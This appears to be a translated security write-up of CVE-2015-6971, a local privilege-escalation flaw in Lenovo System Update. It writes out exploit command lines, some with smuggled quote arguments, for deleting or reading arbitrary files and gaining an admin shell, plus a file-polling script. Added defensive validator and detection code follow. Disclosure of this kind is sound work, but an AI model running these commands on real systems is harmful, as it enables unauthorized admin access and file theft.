Description

Over the last 7 months, a large number of vulnerabilities in Lenovo's System Update software have drawn attention. After Lenovo fixed the first vulnerability this spring, I decided to look more closely at these patches to verify whether the vulnerabilities were still present. As a result I found a related vulnerability (CVE-2015-6971), which I describe in detail below.
Background
Most Lenovo-brand computers include software used to update the system. It detects the computer's hardware configuration and brings drivers and other software up to the latest version (including Windows system patches); the user downloads and installs the updates through Lenovo System Update.
Vulnerability discovery
The vulnerability was originally found by the security vendor IOActive: because of design flaws in the software, a local user's permissions can be elevated to SYSTEM. When I examined the patched version 5.06.0034, I found that it had not been completely fixed.
Lenovo System Update 5.06.0034 consists of several components. One is a Windows service running under the Local System account; the service can receive user commands through a named pipe. Another is a signed client application; the service refuses to execute commands from any application other than the signed one. The problem is that code injected into the running original process bypasses the service-side security check, which makes the check rather pointless. Lenovo released another patch in September to fix this.
Looking at the new version 5.07.0008, I discovered a series of new problems: thanks to the legitimate console it includes, an unprivileged user can also delete arbitrary files from the system.
Working principle
The following commands were tested on 32-bit Windows 10.
On a 64-bit machine, replace %ProgramFiles% with %ProgramFiles(x86)% and check the 32-bit registry location (Wow6432Node).
"%ProgramFiles%\Lenovo\System Update\ConfigService.exe" start
"%ProgramFiles%\Lenovo\System Update\TvsuCommandLauncher.exe" /execute UACSdk.exe /arguments "A1 A2 C:\Users\Administrator\Documents\TopSecret.txt A3" /directory "%ProgramFiles%\Lenovo\System Update" /type COMMAND
Pay attention to TopSecret.txt. If this file is critical to the functioning of a system component, this issue can be used to cause a denial of service.
Next we look at how a low-privileged user can read arbitrary files through this vulnerability. As part of its internal processing, the Lenovo System Update service copies an arbitrary file to a location the user can read; we use the file specified above (C:\Users\Administrator\Documents\TopSecret.txt) as a demo. Monitoring this location and reading the content by hand is tedious, so I wrote a simple Python script to verify it:
import sys

# Poll until temp.reg appears, then print its contents once.
while True:
    try:
        # Adjust the path below on a 64-bit machine
        f = open("C:\\Program Files\\Lenovo\\System Update\\temp.reg", "r")
        print(f.read())
        f.close()
        break
    except IOError as err:
        # File not there yet: print a progress dot and retry
        sys.stdout.write(".")
Check the registry as well: new values appear there. This also means that an attacker can change existing state to load malicious code, for example by replacing the InProcServer32 location of a system component. This method has existed for a long time (Windows 3.1-style), yet the Lenovo software places no restrictions on the import.
Finally, because of a vulnerability in command processing, we can execute commands with administrator permissions.
To try it yourself, run the following commands as a non-privileged user:
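The missing import restriction described above, seen from the defender's side: a privileged importer can read the key headers of a .reg file and refuse anything outside its own subtree or touching COM code-loading keys. This is an added example, not code from the original article or from Lenovo; the allowed subtree and the sample file are placeholders constructed for illustration.

```python
import re

# Hypothetical policy: the only subtree the privileged importer may write (placeholder name).
ALLOWED_SUBTREE = r"HKEY_LOCAL_MACHINE\SOFTWARE\ExampleVendor\Updater"
# Key names that decide which binary Windows loads for a COM class.
CODE_LOADING_KEYS = {"inprocserver32", "localserver32"}

# Constructed .reg content standing in for a file handed to the service.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ExampleVendor\Updater\Preferences]
"Language"="EN"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000000}\InProcServer32]
@="C:\\Users\\Public\\example.dll"

[-HKEY_LOCAL_MACHINE\SOFTWARE\OtherVendor]
'''

# A key header is "[KEY]"; "[-KEY]" asks for the key to be deleted.
KEY_LINE = re.compile(r"^\[(-?)(.+)\]$")


def violations(reg_text):
    """Return (key, reason) for every key header the policy refuses to import."""
    found = []
    allowed = ALLOWED_SUBTREE.lower()
    for line in reg_text.splitlines():
        m = KEY_LINE.match(line.strip())
        if not m:
            continue  # value lines inherit the verdict of their key header
        key = m.group(2)
        lowered = key.lower()
        if CODE_LOADING_KEYS & set(lowered.split("\\")):
            found.append((key, "code-loading key"))
        elif not (lowered == allowed or lowered.startswith(allowed + "\\")):
            action = "delete" if m.group(1) else "write"
            found.append((key, action + " outside allowed subtree"))
    return found


def safe_to_import(reg_text):
    """True only when no key header violates the policy."""
    return not violations(reg_text)
```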
"%ProgramFiles%\Lenovo\System Update\ConfigService.exe" start
echo test > C:\Users\Public\S.log
"%ProgramFiles%\Lenovo\System Update\TvsuCommandLauncher.exe" /execute uacsdk.exe /arguments "A1 A2 C:\Users\Public\S.log "" """ /directory "%ProgramFiles%\Lenovo\System Update" /type COMMAND
At this point you should see the Lenovo System Update GUI. Then compile the following small program (copy UNCObject.dll from %ProgramFiles%\Lenovo\System Update\) and run it as a non-privileged user:
[Image in the original article: source of the small program; not preserved]
This opens a Command Prompt window in which the user has admin-level access (as a member of the BUILTIN\Administrators group). From there, the low-privileged user can do the work of a privileged user!
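Both launcher invocations above share one shape (TvsuCommandLauncher.exe with /execute and /type COMMAND, run by a non-elevated user), which makes them straightforward to hunt for in process-creation logs. The following detection is an added example, not code from the original article; the event records and their field names are constructed for illustration.

```python
import re

SU = r"C:\Program Files\Lenovo\System Update"
# Constructed process-creation records; field names are assumptions, not a real log schema.
SAMPLE_EVENTS = [
    {"user": "alice", "elevated": False, "command_line":
        rf'"{SU}\TvsuCommandLauncher.exe" /execute UACSdk.exe /arguments '
        rf'"A1 A2 C:\Users\Administrator\Documents\TopSecret.txt A3" '
        rf'/directory "{SU}" /type COMMAND'},
    {"user": "bob", "elevated": False, "command_line":
        rf'"{SU}\TvsuCommandLauncher.exe" /execute uacsdk.exe /arguments '
        rf'"A1 A2 C:\Users\Public\S.log "" """ /directory "{SU}" /type COMMAND'},
    {"user": "alice", "elevated": False, "command_line":
        r'"C:\Windows\System32\notepad.exe" C:\Users\alice\notes.txt'},
    {"user": "SYSTEM", "elevated": True, "command_line":
        rf'"{SU}\TvsuCommandLauncher.exe" /execute UACSdk.exe /arguments '
        rf'"A1 A2 A3" /directory "{SU}" /type COMMAND'},
]

LAUNCHER = re.compile(r"\\TvsuCommandLauncher\.exe\b", re.I)
HELPER = re.compile(r"/execute\s+(\S+)", re.I)
ARGS = re.compile(r'/arguments\s+"(.*)"\s+/directory\s+"([^"]*)"', re.I)
TYPE_COMMAND = re.compile(r"/type\s+COMMAND\b", re.I)
# Space-free drive paths only; a path with spaces is cut at the first space.
DRIVE_PATH = re.compile(r"[A-Za-z]:\\\S+")


def review(event):
    """Return a finding for a non-elevated launcher call with /type COMMAND, else None."""
    cmd = event["command_line"]
    if event["elevated"] or not LAUNCHER.search(cmd) or not TYPE_COMMAND.search(cmd):
        return None
    helper = HELPER.search(cmd)
    args = ARGS.search(cmd)
    outside = []
    if args:
        base = args.group(2).rstrip("\\").lower() + "\\"
        outside = [p for p in DRIVE_PATH.findall(args.group(1))
                   if not p.lower().startswith(base)]
    return {"user": event["user"],
            "helper": helper.group(1) if helper else None,
            "paths_outside_install_dir": outside}


def findings(events):
    """Collect the findings for a batch of events, in input order."""
    return [f for f in map(review, events) if f]
```

The match is on the launcher's file name rather than its directory, so it also covers the %ProgramFiles(x86)% install path on 64-bit machines.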
Summary
Multiple vulnerabilities in Lenovo's software allow unauthorized users to gain administrator privileges; for an enterprise environment this is a critical issue. Lenovo recently released a new version (5.07.0013) to solve this problem.

Source: myhack58, "CVE-2015-6971: the Lenovo System Update component vulnerability analysis", published 2015-10-29, http://www.myhack58.com/Article/html/3/62/2015/68411.htm